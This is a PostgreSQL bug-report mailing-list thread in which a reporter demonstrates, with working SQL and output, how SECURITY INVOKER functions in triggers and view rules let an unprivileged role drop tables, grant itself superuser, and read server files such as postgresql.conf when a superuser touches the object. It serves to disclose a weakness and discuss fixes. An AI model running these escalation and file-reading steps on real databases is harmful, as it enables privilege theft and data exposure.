Thread: BUG #13651: trigger security invoker attack

BUG #13651: trigger security invoker attack

The following bug has been logged on the website:

Bug reference:      13651
Logged by:          digoal
Email address:
PostgreSQL version: 9.4.4
Operating system:   CentOS 6.x x64

In my database, there have two role, one normal user, one superuser.

postgres=# \dt
              List of relations
 Schema |       Name       | Type  |  Owner
 public | customer_reviews | table | postgres
 public | t                | table | digoal
 public | t1               | table | postgres
 public | t2               | table | postgres
 public | t3               | table | postgres

I can use normal user create a table , and then create a trigger , in
I drop superuser's table and grant all privilege to normal user.
postgres=# \c postgres digoal
You are now connected to database "postgres" as user "digoal".
postgres=> create table temp_table (id int);

postgres=> create or replace function tg1() returns trigger as $$
  drop table t1 cascade;
  grant all on table t2 to digoal;
  return null;
$$ language plpgsql security invoker;

postgres=> create trigger tg2 before truncate on temp_table for each
statement execute procedure tg1();

when a superuser truncate the temp table,
the trigger will execute,and drop superuser's table t1, and grant t2.
postgres=> \c postgres postgres
You are now connected to database "postgres" as user "postgres".

postgres=# truncate temp_table ;
NOTICE:  00000: drop cascades to rule r1 on table t
CONTEXT:  SQL statement "drop table t1 cascade"
PL/pgSQL function tg1() line 4 at SQL statement
LOCATION:  reportDependentObjects, dependency.c:996

postgres=# \dp+ t2
                              Access privileges
 Schema | Name | Type  |     Access privileges     | Column access
 public | t2   | table | postgres=arwdDxt/postgres+|
        |      |       | digoal=arwdDxt/postgres   |
(1 row)

And rule is security.
postgres=# \c postgres digoal
You are now connected to database "postgres" as user "digoal".
postgres=> create rule r1 as on delete to t do instead delete from t1;
postgres=> delete from t;
ERROR:  permission denied for relation t1

postgres=> \c postgres postgres
You are now connected to database "postgres" as user "postgres".
postgres=# \set VERBOSITY verbose
postgres=# delete from t;
ERROR:  42501: permission denied for relation t1
LOCATION:  aclcheck_error, aclchk.c:3371

Re: BUG #13651: trigger security invoker attack

"David G. Johnston"
On Tuesday, September 29, 2015, <> wrote:

> The following bug has been logged on the website:
> Bug reference:      13651
> Logged by:          digoal
> Email address: <javascript:;>
> PostgreSQL version: 9.4.4
> Operating system:   CentOS 6.x x64
> Description:
> In my database, there have two role, one normal user, one superuser.
> postgres=# \dt
>               List of relations
>  Schema |       Name       | Type  |  Owner
> --------+------------------+-------+----------
>  public | customer_reviews | table | postgres
>  public | t                | table | digoal
>  public | t1               | table | postgres
>  public | t2               | table | postgres
>  public | t3               | table | postgres
Elided truncate trigger dropping t1...

> And rule is security.
> postgres=# \c postgres digoal
> You are now connected to database "postgres" as user "digoal".
> postgres=> create rule r1 as on delete to t do instead delete from t1;
> postgres=> delete from t;
> ERROR:  permission denied for relation t1
I'm surprised this works since t1 shouldn't exist...

postgres=> \c postgres postgres
> You are now connected to database "postgres" as user "postgres".
> postgres=# \set VERBOSITY verbose
> postgres=# delete from t;
> ERROR:  42501: permission denied for relation t1
> LOCATION:  aclcheck_error, aclchk.c:3371
But since t1 does exist and t is owned by digoal the fact that this fails
with a permission error is unsurprising.  Rules execute as the owner of the
relation to which they are attached in order to facilitate data hiding,

David J.

Re: BUG #13651: trigger security invoker attack

a normal user get super privilege, use security invoker function.
postgres=> create table pg_stat_statements (
 userid oid              ,
 dbid                oid      ,        
 queryid             bigint      ,     
 query               text           ,  
 calls               bigint      ,     
 total_time          double precision ,
 rows                bigint           ,
 shared_blks_hit     bigint   ,        
 shared_blks_read    bigint    ,       
 shared_blks_dirtied bigint     ,      
 shared_blks_written bigint      ,     
 local_blks_hit      bigint       ,    
 local_blks_read     bigint          , 
 local_blks_dirtied  bigint        ,  
 local_blks_written  bigint         ,  
 temp_blks_read      bigint          , 
 temp_blks_written   bigint           ,
 blk_read_time       double precision ,
 blk_write_time      double precision );

postgres=> create or replace function f() returns pg_stat_statements as $$                
  alter role digoal superuser;
$$ language plpgsql security invoker;

postgres=> create rule "_RETURN" as on select to pg_stat_statements do instead select * from f();

When a super user select the view pg_stat_statements , the normal user digoal will granted the superuser role.

Yes, it's a normal operation ,but somebody can use these trick.

公益是一辈子的事,I'm Digoal,Just Do It.

在 2015-09-29 23:48:12,"David G. Johnston" <> 写道:
On Tuesday, September 29, 2015, <> wrote:
The following bug has been logged on the website:

Bug reference:      13651
Logged by:          digoal
Email address:
PostgreSQL version: 9.4.4
Operating system:   CentOS 6.x x64

In my database, there have two role, one normal user, one superuser.

postgres=# \dt
              List of relations
 Schema |       Name       | Type  |  Owner
 public | customer_reviews | table | postgres
 public | t                | table | digoal
 public | t1               | table | postgres
 public | t2               | table | postgres
 public | t3               | table | postgres

Elided truncate trigger dropping t1...
And rule is security.
postgres=# \c postgres digoal
You are now connected to database "postgres" as user "digoal".
postgres=> create rule r1 as on delete to t do instead delete from t1;
postgres=> delete from t;
ERROR:  permission denied for relation t1

I'm surprised this works since t1 shouldn't exist...

postgres=> \c postgres postgres
You are now connected to database "postgres" as user "postgres".
postgres=# \set VERBOSITY verbose
postgres=# delete from t;
ERROR:  42501: permission denied for relation t1
LOCATION:  aclcheck_error, aclchk.c:3371

But since t1 does exist and t is owned by digoal the fact that this fails with a permission error is unsurprising.  Rules execute as the owner of the relation to which they are attached in order to facilitate data hiding,

David J.

Re: BUG #13651: trigger security invoker attack

"David G. Johnston"
On Tuesday, September 29, 2015, =E5=BE=B7=E5=93=A5 <> wrote:

> a normal user get super privilege, use security invoker function.
> postgres=3D> create table pg_stat_statements (
>  userid oid              ,
>  dbid                oid      ,
>  queryid             bigint      ,
>  query               text           ,
>  calls               bigint      ,
>  total_time          double precision ,
>  rows                bigint           ,
>  shared_blks_hit     bigint   ,
>  shared_blks_read    bigint    ,
>  shared_blks_dirtied bigint     ,
>  shared_blks_written bigint      ,
>  local_blks_hit      bigint       ,
>  local_blks_read     bigint          ,
>  local_blks_dirtied  bigint        ,
>  local_blks_written  bigint         ,
>  temp_blks_read      bigint          ,
>  temp_blks_written   bigint           ,
>  blk_read_time       double precision ,
>  blk_write_time      double precision );
> postgres=3D> create or replace function f() returns pg_stat_statements as=
> declare
> begin
>   alter role digoal superuser;
> end;
> $$ language plpgsql security invoker;
> postgres=3D> create rule "_RETURN" as on select to pg_stat_statements do
> instead select * from f();
> When a super user select the view pg_stat_statements , the normal user
> digoal will granted the superuser role.
> Yes, it's a normal operation ,but somebody can use these trick.

Everything you just wrote was done as superuser so what's your point?

David J.

BUG #13651: trigger security invoker attack

"David G. Johnston"
On Tuesday, September 29, 2015, David G. Johnston <
<javascript:_e(%7B%7D,'cvml','');>> wrote:

> On Tuesday, September 29, 2015, =E5=BE=B7=E5=93=A5 <> wrote=
>> a normal user get super privilege, use security invoker function.
>> postgres=3D> create table pg_stat_statements (
>>  userid oid              ,
>>  dbid                oid      ,
>>  queryid             bigint      ,
>>  query               text           ,
>>  calls               bigint      ,
>>  total_time          double precision ,
>>  rows                bigint           ,
>>  shared_blks_hit     bigint   ,
>>  shared_blks_read    bigint    ,
>>  shared_blks_dirtied bigint     ,
>>  shared_blks_written bigint      ,
>>  local_blks_hit      bigint       ,
>>  local_blks_read     bigint          ,
>>  local_blks_dirtied  bigint        ,
>>  local_blks_written  bigint         ,
>>  temp_blks_read      bigint          ,
>>  temp_blks_written   bigint           ,
>>  blk_read_time       double precision ,
>>  blk_write_time      double precision );
>> postgres=3D> create or replace function f() returns pg_stat_statements a=
>> $$
>> declare
>> begin
>>   alter role digoal superuser;
>> end;
>> $$ language plpgsql security invoker;
>> postgres=3D> create rule "_RETURN" as on select to pg_stat_statements do
>> instead select * from f();
>> When a super user select the view pg_stat_statements , the normal user
>> digoal will granted the superuser role.
>> Yes, it's a normal operation ,but somebody can use these trick.
> Everything you just wrote was done as superuser so what's your point?
I guess the complaint is that most people, including administrators, aren't
checking to see what rules are being added to tables and if those rules
call invoked functions then the odds of a superuser invoking dangerous code
is significant.  Fine.  It's not a bug and while the risk is non-zero I'm
not coming up with any kind of workable mitigation at the moment.  Don't
let untrustworthy people add code to your database and make sure
admin search-paths are safe to avoid overshadowing.

David J.

Re: BUG #13651: trigger security invoker attack

"David G. Johnston"
And what would be an acceptable solution/behavior in your eyes?

On Tuesday, September 29, 2015, =E5=BE=B7=E5=93=A5 <> wrote:

> The point is:
>    Superuser will be trick possible. like phishing sites.
>   FOR EXP:
>      DBA, or some monitor / admin software query these table or view.
> --
> =E5=85=AC=E7=9B=8A=E6=98=AF=E4=B8=80=E8=BE=88=E5=AD=90=E7=9A=84=E4=BA=8B,=
I'm Digoal,Just Do It.
> =E5=9C=A8 2015-09-30 10:01:12=EF=BC=8C"David G. Johnston" <david.g.johnst=
> <javascript:_e(%7B%7D,'cvml','');>> =E5=86=99=
> On Tuesday, September 29, 2015, =E5=BE=B7=E5=93=A5 <
> <javascript:_e(%7B%7D,'cvml','');>> wrote:
>> a normal user get super privilege, use security invoker function.
>> postgres=3D> create table pg_stat_statements (
>>  userid oid              ,
>>  dbid                oid      ,
>>  queryid             bigint      ,
>>  query               text           ,
>>  calls               bigint      ,
>>  total_time          double precision ,
>>  rows                bigint           ,
>>  shared_blks_hit     bigint   ,
>>  shared_blks_read    bigint    ,
>>  shared_blks_dirtied bigint     ,
>>  shared_blks_written bigint      ,
>>  local_blks_hit      bigint       ,
>>  local_blks_read     bigint          ,
>>  local_blks_dirtied  bigint        ,
>>  local_blks_written  bigint         ,
>>  temp_blks_read      bigint          ,
>>  temp_blks_written   bigint           ,
>>  blk_read_time       double precision ,
>>  blk_write_time      double precision );
>> postgres=3D> create or replace function f() returns pg_stat_statements a=
>> $$
>> declare
>> begin
>>   alter role digoal superuser;
>> end;
>> $$ language plpgsql security invoker;
>> postgres=3D> create rule "_RETURN" as on select to pg_stat_statements do
>> instead select * from f();
>> When a super user select the view pg_stat_statements , the normal user
>> digoal will granted the superuser role.
>> Yes, it's a normal operation ,but somebody can use these trick.
> Everything you just wrote was done as superuser so what's your point?
> David J.

Re: BUG #13651: trigger security invoker attack

"David G. Johnston"
On Tuesday, September 29, 2015, =E5=BE=B7=E5=93=A5 <> wrote:

> I hope this :
>     Nonsuperuser cann't CREATE | ALTER security invoker Functions.

In that case don't hold your breath.  Besides, your rules-based spoofing
doesn't actually have this problem since the rule owner is the invoker, not
the original user.  And I'm still confused regarding your original post and
how it describes an active risk.  Your second example is also flawed as
it requires superuser permissions to work.

Security invoker are safe because the caller cannot do anything they
couldn't otherwise do.  That doesn't mean they should treat the code as
trusted or a black-box.

Do you have a suggestion that doesn't amount to scraping the whole thing
and staring over?

David J.

Re: BUG #13651: trigger security invoker attack

"David G. Johnston"
On Wed, Sep 30, 2015 at 3:02 AM, =E5=BE=B7=E5=93=A5 <> wrote:

> HI,
> If we can change the function's security dynamical, like :
>     When function trigged in trigger or rule, force these function's
> security =3D  table,mview,view's owner.
> There will no risks in the case.
> PS: MySQL do that.

=E2=80=8BIOW: "=E2=80=8B
Relations that are used due to rules get checked against the privileges of
the rule owner, not the user invoking the rule
=E2=80=8B." should apply to functions as well.


I would agree and thought they did but your most example does seem to
indicate otherwise...

David J.

Re: BUG #13651: trigger security invoker attack


The point is:
   Superuser will be trick possible. like phishing sites.
     DBA, or some monitor / admin software query these table or view.

公益是一辈子的事,I'm Digoal,Just Do It.

在 2015-09-30 10:01:12,"David G. Johnston" <> 写道:
On Tuesday, September 29, 2015, 德哥 <> wrote:
a normal user get super privilege, use security invoker function.
postgres=> create table pg_stat_statements (
 userid oid              ,
 dbid                oid      ,        
 queryid             bigint      ,     
 query               text           ,  
 calls               bigint      ,     
 total_time          double precision ,
 rows                bigint           ,
 shared_blks_hit     bigint   ,        
 shared_blks_read    bigint    ,       
 shared_blks_dirtied bigint     ,      
 shared_blks_written bigint      ,     
 local_blks_hit      bigint       ,    
 local_blks_read     bigint          , 
 local_blks_dirtied  bigint        ,  
 local_blks_written  bigint         ,  
 temp_blks_read      bigint          , 
 temp_blks_written   bigint           ,
 blk_read_time       double precision ,
 blk_write_time      double precision );

postgres=> create or replace function f() returns pg_stat_statements as $$                
  alter role digoal superuser;
$$ language plpgsql security invoker;

postgres=> create rule "_RETURN" as on select to pg_stat_statements do instead select * from f();

When a super user select the view pg_stat_statements , the normal user digoal will granted the superuser role.

Yes, it's a normal operation ,but somebody can use these trick.

Everything you just wrote was done as superuser so what's your point?

David J. 

Re: BUG #13651: trigger security invoker attack

I hope this : 
    Nonsuperuser cann't CREATE | ALTER security invoker Functions.

公益是一辈子的事,I'm Digoal,Just Do It.

在 2015-09-30 10:22:15,"David G. Johnston" <> 写道:
And what would be an acceptable solution/behavior in your eyes?

On Tuesday, September 29, 2015, 德哥 <> wrote:

The point is:
   Superuser will be trick possible. like phishing sites.
     DBA, or some monitor / admin software query these table or view.

公益是一辈子的事,I'm Digoal,Just Do It.

在 2015-09-30 10:01:12,"David G. Johnston" <> 写道:
On Tuesday, September 29, 2015, 德哥 <> wrote:
a normal user get super privilege, use security invoker function.
postgres=> create table pg_stat_statements (
 userid oid              ,
 dbid                oid      ,        
 queryid             bigint      ,     
 query               text           ,  
 calls               bigint      ,     
 total_time          double precision ,
 rows                bigint           ,
 shared_blks_hit     bigint   ,        
 shared_blks_read    bigint    ,       
 shared_blks_dirtied bigint     ,      
 shared_blks_written bigint      ,     
 local_blks_hit      bigint       ,    
 local_blks_read     bigint          , 
 local_blks_dirtied  bigint        ,  
 local_blks_written  bigint         ,  
 temp_blks_read      bigint          , 
 temp_blks_written   bigint           ,
 blk_read_time       double precision ,
 blk_write_time      double precision );

postgres=> create or replace function f() returns pg_stat_statements as $$                
  alter role digoal superuser;
$$ language plpgsql security invoker;

postgres=> create rule "_RETURN" as on select to pg_stat_statements do instead select * from f();

When a super user select the view pg_stat_statements , the normal user digoal will granted the superuser role.

Yes, it's a normal operation ,but somebody can use these trick.

Everything you just wrote was done as superuser so what's your point?

David J. 

Re: BUG #13651: trigger security invoker attack

Thanks, there is also other risks in PostgreSQL.
people can use large object function & rule spoofing.

postgres=> create table v2(id int);

postgres=> select lo_create(1);
(1 row)
postgres=> create rule "_RETURN" as on select to v2 do instead select 1 as id from (select lowrite(lo_open(1,131072), con::bytea) from (select string_agg(c,'  |  ') as con from pg_ls_dir('.') as t(c)) t)t;;

postgres=> \c postgres postgres
You are now connected to database "postgres" as user "postgres".
postgres=# select * from v2;
(1 row)

postgres=# \c postgres digoal
postgres=> select convert_from(loread(lo_open(1,262144),1000),'utf8');
 pg_xlog  |  pg_multixact  |  base  |  .s.PGSQL.1922.lock  |  recovery.done  |  pg_log  |  pg_logical  |  pg_subtrans  |  backup_label.old  |  pg_stat_tmp  |  PG_VERSION  |  postmaster.opts  |  tsearch_data  |  pg_stat  |  pg_serial  |  
VITESSE_LICENSE_KEY  |  pg_notify  |  postgresql.conf  |  pg_replslot  |  pg_tblspc  |  pg_ident.conf  |  server.crt  |  pg_dynshmem  |  pg_twophase  |  global  |  server.key  |  .s.PGSQL.1922  |  .s.PGSQL.1921.lock  |  .s.PGSQL.1921  |  |  pg_hba.conf  |  pg_worker_list.conf  |  pg_clog  |  |  pg_snapshots
(1 row)

postgres=> select lo_create(2);
(1 row)

postgres=> drop view v2;
postgres=> create table v2(id int);
postgres=> create rule "_RETURN" as on select to v2 do instead select 1 as id from (select lowrite(lo_open(2,131072), pg_read_binary_file('postgresql.conf'))) t;
postgres=> \c postgres postgres
You are now connected to database "postgres" as user "postgres".
postgres=# select * from v2;
(1 row)
postgres=# \c postgres digoal
You are now connected to database "postgres" as user "digoal".
postgres=> select convert_from(loread(lo_open(2,262144),100000),'utf8');
 # -----------------------------                                                                                                                                              +
 # PostgreSQL configuration file                                                                                                                                              +
 # -----------------------------                                                                                                                                              +
 #                                                                                                                                                                            +
 # This file consists of lines of the form:                                                                                                                                   +
 #                                                                                                                                                                            +
 #   name = value                                                                                                                                                             +
 #                                                                                                                                                                            +
 # (The "=" is optional.)  Whitespace may be used.  Comments are introduced with                                                                                              +
 # "#" anywhere on a line.  The complete list of parameter names and allowed                                                                                                  +
 # values can be found in the PostgreSQL documentation.                                                                                                                       +
 #                                                                                                                                                                            +
 # The commented-out settings shown in this file represent the default values.                                                                                                +
 # Re-commenting a setting is NOT sufficient to revert it to the default value;                                                                                               +
 # you need to reload the server.                                                                                                                                             +
 #                                                                                                                                                                            +
 # This file is read on server startup and when the server receives a SIGHUP                                                                                                  +
 # signal.  If you edit the file on a running system, you have to SIGHUP the                                                                                                  +
 # server for the changes to take effect, or use "pg_ctl reload".  Some                                                                                                       +
 # parameters, which are marked below, require a server shutdown and restart to                                                                                               +

Re: BUG #13651: trigger security invoker attack

If we can change the function's security dynamical, like : 
    When function trigged in trigger or rule, force these function's security =  table,mview,view's owner.
There will no risks in the case.

PS: MySQL do that.